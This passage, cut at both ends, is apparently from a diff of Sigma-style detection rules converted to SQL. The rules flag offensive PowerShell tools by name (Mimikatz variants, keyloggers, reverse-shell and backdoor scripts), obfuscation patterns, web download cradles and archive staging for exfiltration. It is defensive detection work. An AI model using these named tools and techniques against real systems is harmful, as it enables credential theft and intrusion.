ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_susp_msmpeng_crash.yml" + 
"filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + 
"attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE 
'\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": 
"a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" 
], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND 
EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "status": "test", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows 
Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": 